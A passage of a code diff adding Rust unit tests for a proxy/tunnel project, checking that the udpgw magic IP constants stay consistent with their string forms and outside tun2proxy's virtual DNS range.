+            assert!(!is_udpgw_dest(host, 80));
+        }
+        // Unrelated host on the magic port must not match.
+        assert!(!is_udpgw_dest("8.8.8.8", 7300));
+    }
+
+    #[test]
+    fn magic_host_matches_octets() {
+        // `is_udpgw_dest` compares against the dotted-quad `_HOST` strings,
+        // while the `_IP` octet arrays are what tests and future humans
+        // reason about. If the two drift apart, `is_udpgw_dest` silently
+        // stops matching what the Android client sends. Pin them together.
+        assert_eq!(Ipv4Addr::from(UDPGW_MAGIC_IP).to_string(), UDPGW_MAGIC_HOST);
+        assert_eq!(Ipv4Addr::from(LEGACY_UDPGW_MAGIC_IP).to_string(), LEGACY_UDPGW_MAGIC_HOST);
+    }
+
+    #[test]
+    fn magic_ip_outside_virtual_dns_range() {
+        // tun2proxy's `--dns virtual` allocator synthesises fake IPs inside
+        // 198.18.0.0/15 (198.18.0.0 – 198.19.255.255). The *current* magic IP
+        // MUST stay outside that range — see #251. The legacy IP is
+        // intentionally still inside it (that was the bug); it is exempt and
+        // will be removed in v1.10.0.
+        let in_virtual_dns_range = UDPGW_MAGIC_IP[0] == 198 && matches!(UDPGW_MAGIC_IP[1], 18 | 19);
+        assert!(
+            !in_virtual_dns_range,
+            "UDPGW_MAGIC_IP {:?} is inside 198.18.0.0/15 — will collide with tun2proxy --dns virtual (see #251)",
+            UDPGW_MAGIC_IP
+        );
+    }
+}